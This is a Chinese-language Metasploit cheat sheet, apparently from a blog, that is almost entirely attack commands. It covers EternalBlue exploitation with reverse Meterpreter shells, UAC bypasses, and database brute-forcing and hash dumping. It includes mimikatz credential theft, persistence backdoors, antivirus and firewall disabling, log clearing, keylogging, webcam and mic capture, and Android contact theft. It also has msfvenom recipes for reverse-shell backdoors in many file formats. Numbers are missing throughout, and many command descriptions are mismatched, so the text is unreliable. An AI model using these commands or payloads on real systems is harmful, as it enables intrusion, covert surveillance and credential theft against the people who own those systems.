工具 - MSF
#ms17-
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 10.31.-128.1-
set threads
exploit use exploit/windows/smb/ms17_010_eternalblue
set rhost 10.31.36.66
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.31.30.49
set lport
exploit screenshot
信息收集
auxiliary/scanner/discovery/arp_sweep
auxiliary/scancer/smb/smb_version 存活的445主机
auxiliary/scanner/portscan/syn 端口扫描
auxiliary/scanner/telnet/telnet_version telent服务扫描
auxiliary/scanner/rdp/rdp_scanner 远程桌面服务扫描
auxiliary/scanner/ssh/ssh_version ssh主机扫描 Use auxiliary/scanner/smb/smb_version
Set rhosts 192.168.201.1/ //设置目标主机地址
Set threads //设置扫描线程
Run //执行扫描命令 爆破
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/mssql/mssql_login
uxiliary/scanner/ssh/ssh_login use auxiliary/scanner/smb/smb_ms17_010 //使用永恒之蓝探测模块
show options 查看需要添加的信息
set rhosts 192.168.205.1/ //设置扫描目标主机IP地址
set threads //设置扫描线程 use exploit/windows/smb/ms17_010_eternalblue //使用永恒之蓝攻击模块
set payload windows/meterpreter/reverse_tcp //设置一个Payload,使攻击机接受来自目标主机的session
set rhosts 192.168.205.150 //设置目标主机地址
set lhost 192.168.205.148 //设置接受payload的地址,我们这里设置MSF的地址
set LPORT // 设置接受的端口,这个自己自定义,只要不与其它端口冲突就可以
Exploit //执行攻击命令 权限提升
use exploit/windows/local/bypassuac //将通过进程注入使用可信任发布者证书绕过Windows UAC。它将生成关闭UAC标志的第二个shell。
set session //使用sessino 1
Exploit //执行权限提升的攻击模式 Windows权限提升绕过UAC保护(内存注入)
use exploit/windows/local/bypassuac_fodhelper
set session
Exploit 方法三:通过COM处理程序劫持
use exploit/windows/local/bypassuac_comhijack
set session
Exploit 方法四:通过Eventvwr注册表项
use exploit/windows/local/bypassuac_eventvwr
set session
Exploit 其他
通过incognito中的add_localgroup_user提权
域提权 - ms13-、ms15-、ms16-、MS16-、MS14-、ms18_8120_win32k_privesc cat //查看文件内容
Getwd //查看当前工作目录
Download //下载文件到本地 本地创建一个1.txt,将1.txt上传到目标服务器的桌面位置:
Upload /opt/.txt 目标主机 Download 目标主机文件 本地文件路径 Ipconfig/ifoncig //查看目标主机IP地址;
arp –a //用于查看高速缓存中的所有项目;
route //打印路由信息;
netstat -na //可以显示所有连接的端口
Rdesktop //使用rdesktop来连接 -u 用户名 -p 密码,这个命令需要在kali上面安装一下。当我们获取到管理员账号密码的时候就可以直接本地远程登陆目标主机。 run get_local_subnets //获取网段
run autoroute -s 192.168.205.1/ //添加路由
run autoroute -p //查看路由
run autoroute -d -s 172.2.175.0 //删除网段
run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/ //探测该网段下的存活主机。
meterpreter > background //后台sessions 系统信息:
Ps //查看目标主机的进程信息
Kill //杀掉某个进程
Getuid //查看权限
Pwd 查看当前目录路径(目标主机)
Sysinfo //查看目标主机信息,比如版本信息等
Shutdown //关机操作(谨慎操作) Run post/windows/gather/checkvm //查看目标主机是否为虚机;
run post/windows/gather/enum_applications //获取目标主机安装软件信息;
Run post/windows/gather/enum_patches //查看目标主机的补丁信息;
run post/windows/gather/enum_domain //查找目标主机域控。我本地没有域控;
run post/windows/manage/killav //关闭杀毒软件;
run post/windows/manage/enable_rdp //开启3389远程桌面;
run post/windows/gather/enum_logged_on_users //列举当前登陆过主机的用户;
run post/windows/gather/credentials/windows_autologin //抓取自动登陆的用户名和密码;
run post/windows/manage/enable_rdp username=xxx password=xxx //添加远程桌面的用户(同时也会将该用户添加到管理员组) Load命令是加载模块的,在测试中用的最多的就是抓取用户密码的这个模块。
load mimikatz //加载mimikatz,用于抓取密码,不限于明文密码和hash值;
Run hashdump //获取用户密码hash值
msv //获取的是hash值
Ssp //获取的是明文信息
wdigest //读取内存中存放的账号密码明文信息
mimikatz_command -f samdump::hashes //获取用户hash
mimikatz_command -f handle::list //列出应用进程
mimikatz_command -f service::list //列出服务 后门持久化
权限维持
Persistence模块
Run persistence -h //查看帮助信息;
run persistence -U -i -p -r 192.168.205.148
-U:设置后门在用户登录后自启动。该方式会在HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。推荐使用该参数;
-i:设置反向连接间隔时间,单位为秒;
-p:设置反向连接的端口号;
-r:设置反向连接的ip地址。 Metsvc 模块 痕迹清除
clearev Run getgui -e //开启远程桌面;
Run getgui -u cmdback -p //添加用户
Run getgui -f -e //将目标主机上面的3389端口转发到4446
netsh advfirewall set allprofiles state off //关闭防火墙
Webscan_list //查看摄像头列表;
Webscan_stream //摄像头视频获取;
Webscan_chat //查看摄像头接口;
steal_token 试图窃取指定(PID)进程的令牌
use incognito //加载incoginto功能(用来盗窃目标主机的令牌或是假冒用户)
list_tokens –u //列出目标主机用户的可用令牌
list_tokens –g //列出目标主机用户组的可用令牌
keyscan_start //开启键盘记录功能
keyscan_dump //显示捕捉到的键盘记录信息
keyscan_stop //停止键盘记录功能
run post/windows/gather/enum_chrome //获取谷歌缓存
run post/windows/gather/enum_firefox //获取火狐缓存
run post/windows/gather/enum_ie //获取IE缓存
screenshot //截屏
数据库相关 - PostgreSQL
PostgreSQL
auxiliary/scanner/postgres/postgres_version #版本识别
auxiliary/scanner/postgres/postgres_login #暴力破解
导出数据
auxiliary/admin/postgres/postgres_sql
auxiliary/scanner/postgres/postgres_hashdump
auxiliary/admin/postgres/postgres_readfile #读取本地文件
exploit/linux/postgres/postgres_payload #RCE(postgres服务账户具
备/tmp目录的写入权限)
数据库相关 - Mysql
判断Mysql数据库版本 nmap的指纹识别可以精确的判断数据库的版本号,而metasploit提供的模块的特点就是能够判断数据库是否允许外链
msf > use auxiliary/scanner/mysql/mysql_version
msf auxiliary(mysql_version) > set RHOSTS 10.211.55.10
如果允许外链则可以显示版本号"
如果数据库允许外链,则能暴力破解密码 这个模块没有默认字典,新建passs.txt
msf > use auxiliary/scanner/mysql/mysql_login"
枚举数据库信息 msf > use auxiliary/admin/mysql/mysql_enum
枚举的信息包括mysql版本号,操作系统架构,路径和密码hash等一些信息
导出密码hash 可以导出在当前登陆用户权限下可以查看账户的密码hash
msf > use auxiliary/scanner/mysql/mysql_hashdump"
CVE--2122爆破(影响范围很小)
UDF提权 Metasploit提供的exploit适应于5..9以下
利用Mof提权 "这个模块的好处是通过用户名和密码可以直接返回一个meterpreter会话
msf > use exploit/windows/mysql/mysql_mof"
枚举账号密码 "use auxiliary/scanner/mysql/mysql_hashdump
set username root
set password root
run
通过账号密码获取数据库版本,操作系统名称,架构,数据库目录,数据库用户以及密码哈希值。 use auxiliary/admin/mysql/mysql_enum
set username root
set password root
run
执行mysql语句,连接成功后可以在msf执行sql语句 use auxiliary/admin/mysql/mysql_sql
将mysql_schem导出到本地 /root/.msf4/loot/文件夹下 use auxiliary/scanner/mysql/mysql_schemadump
文件枚举和目录可写信息枚举 "auxiliary/scanner/mysql/mysql_file_enum
auxiliary/scanner/mysql/mysql_writable_dirs"
使用账号密码对IP段进行数据库连接 "use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.157.1-
set password root
set username root
run
使用账号密码字典对IP段进行数据库连接 "use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.157.1-
set pass_file /tmp/password.txt
set username root
run
安卓渗透模块 msf > use exploit/multi/handler 设置模块
msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp 设置payload为反向tcp连接
msf exploit(multi/handler) > show options 查看参数
set lhost 192.168.11.111 设置本地的IP地址
set lport 设置端口,跟前面生成木马连接的端口号要对应一样
msf exploit(multi/handler) > show options 查看参数
msf exploit(multi/handler) > exploit -j
msf exploit(multi/handler) > sessions -i
meterpreter > sysinfo
meterpreter > dump_calllog
后门生成:
jsp:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.146 LPORT=1234 R >text.jsp php:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f raw >text.php asp:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f asp > shell.asp aspx:
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx apk木马:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 R >text.apk Windows exe后门:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 X >test.exe Linux:、
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 X >text
Shell反弹
()使用msfvenom生成msf反弹的php脚本木马,默认端口为4444:
msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.1.3 -f raw > test.php
()在独立IP或者反弹服务器上运行msf依次执行以下命令:
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.1.3 //192.168.1.3为反弹监听服务器IP
show options
run
()上传并执行php文件
将test.php上传到192.168.1.2服务器上面,访问后即可获取msf反弹shell
http:// 192.168.1.2:8080/test.php
后渗透
查看进程
ps
注入进程
migrate
查看远程桌面
查看文件
run vnc
编辑文件
cat
上传文件
edit
下载文件
upload
删除文件
download
创建文件夹
rm
删除文件夹
mkdir
查看会话
rmdir
退出当前会话
sessions -l
在线用户数
backgroud
让键盘失效
enumdesktops
恢复键盘
uictl disable keyboard
音频录制
uictl enable keyboard
开启摄像头
record_mic -d 10
桌面抓图
webcam_stream
系统信息查询
screenshot
获取最高权限
sysinfo getsystem
密码hash
hashdump
搜索
search
search -f *.jpg
download
打开前置或后置摄像头
webcam_stream -i 1/2
检测root
check_root
下载电话记录
dump_calllog
下载信息记录
dump_contacts
定位,需要下载谷歌地图
geolocate
开启监听
use exploit/multi/hanler
问题
(1)[-] Handler failed to bind to 192.168.1.211::- -重启msf
工具 - MSF的更多相关文章
- BT渗透工具使用学习笔记
BT51.信息收集2.扫描工具3.漏洞发现4.社会工程学工具5.运用层攻击MSF6.局域网攻击7.密码破解8.维持访问一.DNS信息收集1.Dnsenum/pentest/enumeration/dn ...
- 实战!利用MSF批量扫描校园网中含有MS17_010漏洞的主机并入侵
利用ms17_010的永恒之蓝在前些日子火爆了一段时间,校园网中也声称封锁了相应端口.最近在搞MSF的深入学习,于是有了下文. ms17_010扫描工具 msf中的辅助模块含有一个强大的ms17_01 ...
- 渗透工具Burp Suite浅析
Burp suite是一款Web安全领域的跨平台工具,基于Java开发.它集成了很多用于发现常见Web漏洞的模块,如Proxy,Spider,Scanner,Intruder,Repeater等.所有 ...
- Metasploit用法大全
Metasploit用户接口msfconsoleArmitage: KaliGUI启动:armitage命令启动 Metasploit功能程序msfvenom集成了载荷生成器.载荷编码器.空指令生成 ...
- [转]据说200G网盘资料
来源:HACK学习呀 2015cracer入侵入门到精通视频教程 点我查看 trf3 一笔√带过入侵教程 点我查看 ypan [复仇者]新手入门系列(7套) 点我查看 g1tb 菜鸟入门,做的确实不错 ...
- metasploit 读书笔记-信息收集
三、信息收集 被动信息收集 在不接触目标系统时进行的信息收集,包括使用工具Yeti、Whois (1)Whois msf > whois secmaniac.net (2)Netcraft:fi ...
- Metasploit的攻击实例讲解----ms10_046快捷方式图标漏洞
不多说,直接上干货! 准备工具 1.Kali linux 2016.2(Rolling)系统 IP: 192.168.1.103 2.受害者机子(windows XP系统) IP: 10.10 ...
- 2019-9-20:渗透测试,基础学习,笔记,metasploit的基础使用
使用kali下metasploit生成木马,控制windows系统 kali基于debin的数字取证系统,上面集成了很多渗透测试工具,前身为bt r3(BrackTrack) Metasploit,是 ...
- 200G网盘资源分享
今日偶得大量网盘资源,遂写一博文以分享! 来源:HACK学习呀,微信公众号:HACK学习呀 文件名 链接 提取密码 2015cracer入侵入门到精通视频教程 点我查看 trf3 一笔√带过入侵教程 ...
随机推荐
- JavaEE高级-MyBatisPlus学习笔记
第 1 章 简介 1.1 MyBatisPlus 介绍 -MyBatis-Plus(简称 MP),是一个 MyBatis 的增强工具包,只做增强不做改变. 为简化开发工作.提高生产率而生我们的愿景是成 ...
- Python列表(list)的方法调用
#list# n = [12,34,"yue"]# v = n.append(27) #增加元素,注意是在尾部增加,由于列表是可修改的,所以是在原列表中增加,与字符串存在区别# p ...
- centos7系统时间修复
https://www.cnblogs.com/xsbx/p/10172728.html
- activity manager
首先 activity manager 作为一个独立的服务存在,所有系统中的所有 app 的 activity 都通过这个 service 来管理 同时 activity manager 维护着多个 ...
- 笔记42 Spring Web Flow——Demo(2)
转自:https://www.cnblogs.com/lyj-gyq/p/9117339.html 为了更好的理解披萨订购应用,再做一个小的Demo. 一.Spring Web Flow 2.0新特性 ...
- bzoj4998 星球联盟 LCT + 并查集
题目传送门 https://lydsy.com/JudgeOnline/problem.php?id=4998 题解 根据题意,就是要动态维护点双,求出一个点双的权值和. 所以这道题就是和 bzoj2 ...
- ZROI 19.07.28 序列数据结构/jk
写在前面 dls:"我不会数据结构,但是APIO的数据结构场我写了,还是蛮简单的." T1 CF643G Sol: 有一个\(O(n\log^2n)\)的做法:假设将区间排好序,取 ...
- java调用存储过程的方式
1.问号是入参和出参,出参要指定类型 CallableStatement pstmt = conn.prepareCall("{call dbo.UP_CodeUp_***(?,?,?,?, ...
- 6389. 【NOIP2019模拟2019.10.26】小w学图论
题目描述 题解 之前做过一次 假设图建好了,设g[i]表示i->j(i<j)的个数 那么ans=∏(n-g[i]),因为连出去的必定会构成一个完全图,颜色互不相同 从n~1染色,点i的方案 ...
- 寻找的常用webstorm快捷键
1. 必备快捷键 Ctrl+/:注释当前行 Ctrl+Shift+/:当前位置插入注释 Ctrl+Alt+/:块注释,并Focus到首行,写注释说明用的 Ctrl+Shift+A:选择当前标签前后,修 ...